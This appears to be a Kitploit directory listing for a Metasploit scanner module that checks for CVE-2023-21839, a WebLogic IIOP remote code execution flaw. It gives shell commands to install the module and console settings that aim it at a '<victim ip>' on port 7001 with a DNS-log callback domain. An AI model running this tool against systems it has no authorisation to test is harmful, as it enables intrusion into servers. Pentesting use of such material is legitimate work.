Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-21839-metasploit-scanner | Kitploit
Tools/GitHubGitHub/kw3h4/cve-2023-21839-metasploit-scanner
ReconnaissanceExploit FrameworksVulnerability AnalysisWeb Application ExploitationPenetration TestingPayload Development
GitHubkw3h4/cve-2023-21839-metasploit-scanner

CVE-2023-21839-metasploit-scanner

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
3 years agoNot yet reviewed

CVE-2023-21839-metasploit-scanner

Usage

git clone https://github.com/kurehalin/CVE-2023-21839-metasploit-scanner
cd CVE-2023-21839-metasploit-scanner
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp weblogic_iiop_rce.py ~/.msf4/modules/auxiliary/scanner/http
chmod +x ~/.msf4/modules/auxiliary/scanner/http/weblogic_iiop_rce.py
msfconsole

POC usage

use auxiliary/scanner/http/weblogic_iiop_rce
set rhost <victim ip>
set rport 7001
set verify_dns_log <your specific dnslog domain>
run

result

result 1 result 2

reference

  • https://github.com/4ra1n/CVE-2023-21839
  • https://github.com/houqe/POC_CVE-2023-21839
Download Tool